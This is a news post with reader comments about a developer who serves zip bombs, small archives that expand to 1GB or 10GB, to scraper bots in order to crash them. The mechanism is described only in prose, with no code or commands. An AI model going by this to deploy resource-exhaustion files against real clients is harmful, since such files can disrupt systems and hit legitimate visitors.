Arthur T Knackerbracket has processed the following story:
Diallo says he made a 1MB file that decompresses into 1GB to disable bots trying to break into his system. He also has a 10MB-to-10GB compressed file for bots with more resources, ensuring that their memory is overwhelmed by this massive archive.
This is how this defensive bombing system works: when Diallo detects an offending bot, his server returns a 200 OK response and then serves up the zip bomb. The file’s metadata tells the bot that it’s a compressed file, so it will then open it in an attempt to scrape as much information as possible. However, since the file is at least 1GB when unpacked, it will overwhelm the memory of most simple — and even some advanced — bots. If he faces a more advanced scraper with a few gigabytes of memory, he’ll feed it the 10GB zip bomb, which will most likely crash it.
If you want to try this system for yourself, Diallo outlines how you can create your own bot-targeting zip bomb on his blog. He notes that you should be careful when doing that, though, as you can potentially self-detonate (i.e., accidentally open the zip bomb), and crash your own server. They’re also not 100% effective, as there are ways to detect zip and disregard zip bombs. But for most simple bots, this should be more than enough to cause its server to freeze and take it out — at least until its system is restarted.
(Score: 5, Funny) by psa on Monday May 05, @11:46PM (3 children)
It's very kind of people like this to provide sanity checking tests to make tomorrow's bots more robust and intelligent about how they scrape content. This reminds of a previous article about people creating navigational traps. An excellent way, really, to ensure that bot makers produce proper unique content checks, depth and breadth checks on the site graph, and intelligent detection of when links are actually worth following.
This is, after all, exactly the service that bug finders, app store audits, and even heuristic antivirus provide.
(Score: 3, Touché) by Anonymous Coward on Monday May 05, @11:58PM
Just the usual cat and mouse, but it's going from Tom and Jerry to Itchy and Scratchy Land. Please turn off your flash!
(Score: 1, Interesting) by Anonymous Coward on Tuesday May 06, @02:29AM (1 child)
Indeed, and one wonders whether they have done this and tested this scenario. Or if they're even downloading large binary attachments.
Has this been validation-tested? Does crawling slow after they hit a large zip? Does it slow more than the proportional download size? Has there been any testing at all, prior to large binary blobs being offered to the world?
Has there been any attempt to create a maximally-large dictionary for maximal memory-consumption while decompressing, or is this solely about the written-to-disk size of the extracted object?
What is this idiot actually accomplishing? Does any part of this seem more advanced than a middle schooler?
(Score: 2, Touché) by Anonymous Coward on Tuesday May 06, @12:36PM
Try reading the developer's linked blog post [idiallo.com], then get back to us.